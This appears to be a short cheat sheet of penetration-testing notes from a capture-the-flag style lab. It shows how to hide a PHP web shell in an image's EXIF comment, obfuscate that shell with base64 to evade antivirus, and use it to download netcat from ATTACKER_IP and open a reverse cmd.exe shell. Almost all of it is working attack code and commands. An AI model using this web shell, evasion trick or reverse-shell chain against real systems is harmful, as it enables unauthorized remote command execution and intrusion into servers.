# PHP Payload in Image ExifData

* Test 
```sh
exiftool -Comment="<?php echo \"<pre>Test Payload</pre>\"; die(); ?>" test-USERNAME.jpeg.php
```

* Build Payload with AV evasion
```sh
<?php
    $cmd = $_GET["wreath"];
    if (isset($cmd)){
        echo "<pre>" . shell_exec($cmd) . "</pre>";
    }
    die();
?>
```

* [php obfuscater](https://www.gaijin.at/en/tools/php-obfuscator)

* Obfuscated code with escaped `$`
```sh
<?php \$p0=\$_GET[base64_decode('d3JlYXRo')];if(isset(\$p0)){echo base64_decode('PHByZT4=').shell_exec(\$p0).base64_decode('PC9wcmU+');}die();?>
```
* Upload and execute commands with get parameter `?wreath=systeminfo`

## Uploading Reverse through Webshell
* Parameter for Webshell
```sh
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
```
* Trigger uploaded netcat
```sh
powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe
```